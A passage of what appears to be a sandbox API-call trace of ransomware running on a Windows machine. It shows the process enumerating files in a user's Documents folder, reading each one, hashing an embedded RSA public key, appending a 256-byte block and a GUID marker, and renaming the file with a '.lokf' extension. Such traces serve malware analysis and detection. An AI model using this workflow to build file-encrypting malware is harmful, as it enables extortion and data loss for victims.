RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.369] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x13e76, lpOverlapped=0x0) returned 1 [0060.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.370] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.370] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.370] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.370] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.371] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.371] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.371] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.371] GetLastError () returned 0x0 [0060.371] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.371] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.371] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.371] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.371] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.371] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.371] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.372] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13e76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.372] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.372] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.372] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.372] CloseHandle (hObject=0x5cc) returned 1 [0060.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0060.373] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.373] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\E8XcFurbwLsj.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\e8xcfurbwlsj.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\E8XcFurbwLsj.rtf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\e8xcfurbwlsj.rtf.lokf")) returned 1 [0060.374] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9937720, ftCreationTime.dwHighDateTime=0x1d4cc2e, ftLastAccessTime.dwLowDateTime=0xc1d41b50, ftLastAccessTime.dwHighDateTime=0x1d4c788, ftLastWriteTime.dwLowDateTime=0xc1d41b50, ftLastWriteTime.dwHighDateTime=0x1d4c788, nFileSizeHigh=0x0, nFileSizeLow=0x12023, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ipuh6vEIRVj3YgV2b.pdf", cAlternateFileName="IPUH6V~1.PDF")) returned 1 [0060.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32add78 [0060.374] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0060.374] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\ipuh6vEIRVj3YgV2b.pdf") returned=".pdf" [0060.375] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\ipuh6vEIRVj3YgV2b.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\ipuh6veirvj3ygv2b.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.375] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=73763) returned 1 [0060.375] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.377] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11ffd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.377] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.378] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x12023, lpOverlapped=0x0) returned 1 [0060.378] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.378] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.378] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.378] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.379] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.379] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.379] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.379] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.379] GetLastError () returned 0x0 [0060.379] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.379] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.379] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.379] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.379] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.380] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.380] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12023, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.380] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.381] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.381] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.381] CloseHandle (hObject=0x5cc) returned 1 [0060.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0060.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0060.382] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\ipuh6vEIRVj3YgV2b.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\ipuh6veirvj3ygv2b.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\ipuh6vEIRVj3YgV2b.pdf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\ipuh6veirvj3ygv2b.pdf.lokf")) returned 1 [0060.383] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90df1240, ftCreationTime.dwHighDateTime=0x1d4d41f, ftLastAccessTime.dwLowDateTime=0xbea3a3e0, ftLastAccessTime.dwHighDateTime=0x1d4d0f4, ftLastWriteTime.dwLowDateTime=0xbea3a3e0, ftLastWriteTime.dwHighDateTime=0x1d4d0f4, nFileSizeHigh=0x0, nFileSizeLow=0x13b3e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="J45F bTMyBPSJH5EBiu.odt", cAlternateFileName="J45FBT~1.ODT")) returned 1 [0060.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32add78 [0060.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0060.383] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\J45F bTMyBPSJH5EBiu.odt") returned=".odt" [0060.383] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\J45F bTMyBPSJH5EBiu.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\j45f btmybpsjh5ebiu.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.383] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=80702) returned 1 [0060.383] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.386] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13b18, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.386] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.386] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.387] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x13b3e, lpOverlapped=0x0) returned 1 [0060.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.387] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.387] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.387] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.388] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.388] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.388] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.388] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.388] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.388] GetLastError () returned 0x0 [0060.388] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.388] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.388] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.388] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.388] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.388] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.388] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.389] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.389] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x13b3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.389] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.389] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.389] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.389] CloseHandle (hObject=0x5cc) returned 1 [0060.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0060.390] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8d0) returned 0x3268798 [0060.390] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\J45F bTMyBPSJH5EBiu.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\j45f btmybpsjh5ebiu.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\J45F bTMyBPSJH5EBiu.odt.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\j45f btmybpsjh5ebiu.odt.lokf")) returned 1 [0060.392] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb597f50, ftCreationTime.dwHighDateTime=0x1d4d223, ftLastAccessTime.dwLowDateTime=0xa90fd980, ftLastAccessTime.dwHighDateTime=0x1d4cbbe, ftLastWriteTime.dwLowDateTime=0xa90fd980, ftLastWriteTime.dwHighDateTime=0x1d4cbbe, nFileSizeHigh=0x0, nFileSizeLow=0x10813, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K01vTC0.xlsx", cAlternateFileName="K01VTC~1.XLS")) returned 1 [0060.392] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32add78 [0060.392] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0060.392] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\K01vTC0.xlsx") returned=".xlsx" [0060.392] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\pW62l8V1WmQv\\K01vTC0.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\pw62l8v1wmqv\\k01vtc0.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.392] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=67603) returned 1 [0060.392] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.394] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x107ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.394] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.395] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.395] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.395] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.395] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x10813, lpOverlapped=0x0) returned 1 [0060.396] lstrlenA (lpString="-----BEGIN PUBLIC 